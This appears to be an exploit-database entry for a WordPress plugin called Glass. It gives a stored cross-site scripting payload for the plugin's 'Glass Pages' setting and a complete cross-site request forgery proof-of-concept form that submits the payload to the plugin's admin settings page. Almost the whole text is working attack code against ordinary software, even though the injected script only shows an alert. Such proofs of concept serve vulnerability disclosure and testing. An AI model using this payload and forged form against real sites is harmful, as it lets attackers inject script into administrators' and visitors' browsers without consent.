Share
## https://sploitus.com/exploit?id=WPEX-ID:DBEA2DC2-83F6-4E70-B044-A68A4C9B9C39
Add the following payload in the "Glass Pages" setting (/wp-admin/options-general.php?page=glass%2Fglass.php): '><script>alert(/XSS/)</script>
Via CSRF:
<html>
<body>
<form action="https://example.com/wp-admin/options-general.php?page=glass/glass.php" method="POST">
<input type="hidden" name="myrtheGlassDefaultSize" value="4" />
<input type="hidden" name="myrtheGlassRimPath" value="" />
<input type="hidden" name="myrtheGlassRimRGB" value="CC6633" />
<input type="hidden" name="myrtheGlassBackgroundRGB" value="999999" />
<input type="hidden" name="myrtheGlassMinEnlarge" value="2.0" />
<input type="hidden" name="myrtheGlassMaxEnlarge" value="100.0" />
<input type="hidden" name="myrtheGlassDx" value="0" />
<input type="hidden" name="myrtheGlassDy" value="0" />
<input type="hidden" name="myrtheGlassOnFrontPage" value="y" />
<input type="hidden" name="myrtheGlassCategories" value="" />
<input type="hidden" name="myrtheGlassPages" value="'><script>alert(/XSS/)</script>" />
<input type="hidden" name="myrtheGlassExcludePlatforms" value="iPod" />
<input type="hidden" name="update_MyrtheGlassSettings" value="Update Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>